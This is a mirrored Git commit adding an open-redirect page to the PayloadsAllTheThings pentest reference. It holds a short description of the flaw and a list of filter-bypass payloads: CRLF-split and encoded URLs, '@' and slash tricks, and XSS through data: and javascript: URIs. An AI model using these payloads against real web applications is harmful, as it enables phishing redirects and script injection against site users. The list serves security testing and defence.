mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Open Redirect Payloads
This commit is contained in:
swisskyrepo
parent
758f643d56
commit
2696be89ef
1 changed files with 63 additions and 6 deletions
|
|
@ -1,12 +1,69 @@
|
|||
# Title
|
||||
Lorem
|
||||
# Open URL Redirection
|
||||
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
|
||||
|
||||
## Vuln
|
||||
## Exploits
|
||||
|
||||
Using CRLF to bypass "javascript" blacklisted keyword
|
||||
```
|
||||
Code
|
||||
java%0d%0ascript%0d%0a:alert(0)
|
||||
```
|
||||
|
||||
Using "//" to bypass "http" blacklisted keyword
|
||||
```
|
||||
//google.com
|
||||
```
|
||||
|
||||
Using "https:" to bypass "//" blacklisted keyword
|
||||
```
|
||||
https:google.com
|
||||
```
|
||||
|
||||
Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
|
||||
```
|
||||
\/\/google.com/
|
||||
/\/google.com/
|
||||
```
|
||||
|
||||
|
||||
Using "%E3%80%82" to bypass "." blacklisted character
|
||||
```
|
||||
//google%E3%80%82com
|
||||
```
|
||||
|
||||
|
||||
Using null byte "%00" to bypass blacklist filter
|
||||
```
|
||||
//google%00.com
|
||||
```
|
||||
|
||||
Using "@" character, browser will redirect to anything after the "@"
|
||||
```
|
||||
http://www.theirsite.com@yoursite.com/
|
||||
```
|
||||
|
||||
Creating folder as their domain
|
||||
```
|
||||
http://www.yoursite.com/http://www.theirsite.com/
|
||||
http://www.yoursite.com/folder/www.folder.com
|
||||
```
|
||||
|
||||
|
||||
XSS from Open URL - If it's in a JS variable
|
||||
```
|
||||
";alert(0);//
|
||||
```
|
||||
|
||||
XSS from data:// wrapper
|
||||
```
|
||||
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
|
||||
```
|
||||
|
||||
XSS from javascript:// wrapper
|
||||
```
|
||||
http://www.example.com/redirect.php?url=javascript:prompt(1)
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
* Lorem
|
||||
* Ipsum
|
||||
* filedescriptor
|
||||
* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
|
||||
Loading…
Reference in a new issue